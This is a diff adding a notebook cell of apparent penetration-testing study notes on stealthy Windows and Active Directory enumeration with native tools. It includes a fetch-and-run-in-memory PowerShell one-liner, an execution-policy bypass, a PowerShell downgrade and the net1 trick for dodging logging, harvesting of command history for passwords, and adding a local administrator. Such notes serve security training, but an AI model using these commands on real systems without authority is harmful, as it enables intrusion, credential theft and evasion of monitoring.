--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -8726,7 +8726,169 @@
   {
    "cell_type": "markdown",
    "metadata": {},
-   "source": []
+   "source": [
+    "Using native Windows tools is a stealthier approach than loading tools from the internet, as it may not create as many log entries and alerts. Most modern enterprise environments have some form of network monitoring and logging, including IDS/IPS, firewalls, and passive sensors and tools on top of their host-based defenses such as Windows Defender or enterprise EDR. Depending on the environment, there may be tools that take a baseline of \"normal\" network traffic and look for anomalies. Because of this, the chances of getting caught go up exponentially when tools are pulled into the environment from the internet. \n",
+    "\n",
+    "The following environmental commands can be run to get more information about the Windows host:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Command|Result|\n",
+    "|-------|------|\n",
+    "|`hostname`|Prints the PC's name|\n",
+    "|`[System.Environment]::OSVersion.Version`|Prints out the OS version and revision level|\n",
+    "|`wmic qfe get Caption,Description,HotFixID,InstalledOn`|Prints the patches and hotfixes applied to the host|\n",
+    "|`ipconfig /all`|Prints out network adapter state and configurations|\n",
+    "|`set`| Displays a list of environment variables for the current session (CMD)|\n",
+    "|`echo %USERDOMAIN%`|Displays the domain name to which the host belongs (CMD)|\n",
+    "|`echo %logonserver%`|Prints out the name of the domain controller the host checks in with (CMD)|\n",
+    "|`systeminfo`|Prints a summary of the host's information|\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "**<u>PowerShell</u>**\n",
+    "\n",
+    "PowerShell provides Windows sysadmins with an extensive framework for administering all facets of Windows systems and AD environments. PowerShell has many built-in functions and modules that can be used in an engagement to recon the host and network, and send and receive files. \n",
+    "\n",
+    "The following commands can be run via PowerShell:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Cmd-Let|Description|\n",
+    "|-------|------|\n",
+    "|`Get-Module`|Lists available modules loaded for use|\n",
+    "|`Get-Host`|Pulls information about PowerShell, including version|\n",
+    "|`Get-ExecutionPolicy -List`|Prints the execution policy settings for each scope on a host|\n",
+    "|`Set-ExecutionPolicy Bypass -Scope Process`|This will change the policy for the current process using the -Scope parameter. Doing so will revert the policy once the process is terminated or vacated. This is not a permanent change|\n",
+    "|`Get-ChildItem Env: \\| ft Key,Value`|Returns environment values such as key paths, users, computer information, etc.|\n",
+    "|`Get-Content $env:APPDATA\\Microsoft\\Windows\\Powershell\\PSReadline\\ConsoleHost_history.txt`|This string gets the specified user's PowerShell history. This may disclose passwords, or point towards configuration files or scripts that contain passwords|\n",
+    "|`powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>\"`|This is a quick way to doanload a file from the web using PowerShell and call it from memory|\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "PowerShell event logging was introducted as a feature with PowerShell 3.0. It is possible to downgrade PowerShell to an older version, however. This will essentially disable logging of actions from the shell; everything after the following command will not be logged, but the command will be logged:\n",
+    "```powershell\n",
+    "powershell.exe -version 2\n",
+    "\n",
+    "```\n",
+    "**<u>Checking Defenses</u>**\n",
+    "\n",
+    "The following commands help determine the firewall settings, and check the status of Windows Defender:\n",
+    "```powershell\n",
+    "netsh advfirewall show allprofiles     #powershell\n",
+    "\n",
+    "sc query windefend         #cmd\n",
+    "\n",
+    "```\n",
+    "The following command checks the status and configuration settings in PowerShell. It is imperative to see what settings are enabled/disabled, how often scans are run, if the on-demand threat alerting is active, etc:\n",
+    "```powershell\n",
+    "Get-MpComputerStatus\n",
+    "\n",
+    "```\n",
+    "**<u>Network Information</u>**\n",
+    "\n",
+    "When landing on a host for the first time, it is important to see who else is logged on, especially if someone else is logged on. If a popup window launches or a user is logged out of their session, they may report these actions or change their password. The following command shows active sessions with usernames:\n",
+    "```powershell\n",
+    "qwinsta\n",
+    "\n",
+    "```\n",
+    "Other network settings that should be enumerated include:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Commands|Description|\n",
+    "|--------|-----------|\n",
+    "|`arp -a`|Lists all known hosts stored in the arp table|\n",
+    "|`ipconfig /all`|Prints out adapter settings for the hosts|\n",
+    "|`route print`|Displays the routing table, identifying known networks and L3 routes shared with the host|\n",
+    "|`netsh advfirewall show allprofiles`|Displays the status of the host's firewall|\n",
+    "\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "Any networks that appear in the routing table are potential avenues for lateral movement because they are accessed enough that a route was added, or it has administratively been set there so that the host knows how to access resources on the domain. Using `arp -a` and `route print` will not only benefit enumerating AD environments, but will also assist in identifying opportunities to pivor to different network segments in any environments. \n",
+    "\n",
+    "<br>\n",
+    "\n",
+    "**<u>Windows Management Instrumentation (WMI)</u>**\n",
+    "\n",
+    "WMI is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts. For AD enumeration, WMI can be used to create a report on domain users, groups, processes, and other information from the domain host(s), as follows:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Commands|Description|\n",
+    "|--------|-----------|\n",
+    "|`wmic qfe get Caption,Description,HotFixID,InstalledOn`|Prints the patch level and description of the Hotfixes applied|\n",
+    "|`wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List`|Displays basic host information to include any attributes within the list\n",
+    "|`wmic process list /format:list`|A listing of all processes on host|\n",
+    "|`wmic ntdomain list /format:list`|Displays information about the Domain and Domain Controllers|\n",
+    "|`wmic useraccount list /format:list`|Displays information about all local accounts and any domain accounts that have logged into the device|\n",
+    "|`wmic group list /format:list`|Information about all local groups|\n",
+    "|`wmic sysaccount list /format:list`|Dumps information about any system accounts that are being used as service accounts|\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "The following query can be used to get information about the domain, child domain(s), and the external forest that the current domain has trust with:\n",
+    "```powershell\n",
+    "wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress\n",
+    "\n",
+    "```\n",
+    "**<u>Net Commands</u>**\n",
+    "\n",
+    "Net commands can be used to query the local host and remote hosts, similar to the capabilities of WMI. **Local and domain users, groups, hosts, specific users in groups, domain controllers, and password requirements** can all be listed via net commands. It is important to note that `net.exe` commands are typically monitored by EDR solutions and can quickly give up the attacker's location. Some organizations configure their monitoring tools to throw alerts if certain commands are run by users in specific OUs. The following table describes useful net commands:\n",
+    "\n",
+    "<center>\n",
+    "\n",
+    "|Commands|Description|\n",
+    "|--------|-----------|\n",
+    "|`net accounts`|Information about password requirements|\n",
+    "|`net accounts /domain`|Password and lockout policy|\n",
+    "|`net group /domain`|Information about domain groups|\n",
+    "|`net group \"Domain Admins\" /domain`|List users with domain admin privileges|\n",
+    "|`net group \"domain computers\" /domain`|List of PCs connected to the domain|\n",
+    "|`net group \"Domain Controllers\" /domain`|List PC accounts of domains controllers|\n",
+    "|`net group <domain_group_name> /domain`|User that belongs to the group|\n",
+    "|`net groups /domain`|List of domain groups|\n",
+    "|`net localgroup`|All available groups|\n",
+    "|`net localgroup administrators /domain`|List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)|\n",
+    "|`net localgroup Administrators`|Information about a group (admins)|\n",
+    "|`net localgroup administrators [username] /add`|Add user to administrators|\n",
+    "|`net share`|Check current shares|\n",
+    "|`net user <ACCOUNT_NAME> /domain`|Get information about a user within the domain|\n",
+    "|`net user /domain`|List all users of the domain|\n",
+    "|`net user %username%`|Information about the current user|\n",
+    "|`net use x: \\computer\\share`|Mount the share locally|\n",
+    "|`net view`|Get a list of computers|\n",
+    "|`net view /all /domain[:domainname]`|Shares on the domains|\n",
+    "|`net view \\computer /ALL`|List shares of a computer|\n",
+    "|`net view /domain`|List of PCs of the domain|\n",
+    "\n",
+    "</center>\n",
+    "\n",
+    "If it is known or assumed that the network defenders are actively logging/looking for any command out of the normal, type `net1` instead of `net`, as it will execute the same functions without the potential trigger from the net string. \n",
+    "\n",
+    "<br>\n",
+    "\n",
+    "**<u>Dsquery</u>**\n",
+    "\n",
+    "Dsquery is a CLI tool that can be used to find AD objects. The queries run with this tool can easily be replicated with BloodHound and PowerView, but these tools may not always be accessible. Dsquery will exist on any host with the AD domain services role installed, and the ds query DLL exists on all modern windows systems by default, found at **C:\\Windows\\System32\\dsquery.dll.** However, to the Dsquery DLL requires elevated privileges on a host or the ability to run an instance of CMD or PowerShell from a SYSTEM context. If possible, the following search filters can be used:\n",
+    "```powershell\n",
+    "dsquery user      #shows all user information\n",
+    "\n",
+    "dsquery computer  #shows all computer information\n",
+    "\n",
+    "dsquery * \"CN=Users,DC=domain,DC=controller\"    #wildcard search\n",
+    "\n",
+    "dsquery * -filter \"(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))\" -attr distinguishedName userAccountControl  \n",
+    "```\n",
+    "The final command combines dsquery with LDAP search filters, particularly looking for users with the PASSWD_NOTREQD flag set in the userAccountControl attribute. The following command looks for all domain controllers in the current domain, limited to five results:\n",
+    "```powershell\n",
+    "dsquery * -filter \"(userAccountControl:1.2.840.113556.1.4.803:=8192)\" -limit 5 -attr sAMAccountName\n",
+    "\n",
+    "```\n",
+    "\n",
+    "The arbitrary looking string is a common LDAP query that can be used with several different tools, like AD PowerShell, ldapsearch, etc. This query in particular looks at the User Account Control (UAC) attributes for an object. "
+   ]
   },
   {
    "cell_type": "markdown",
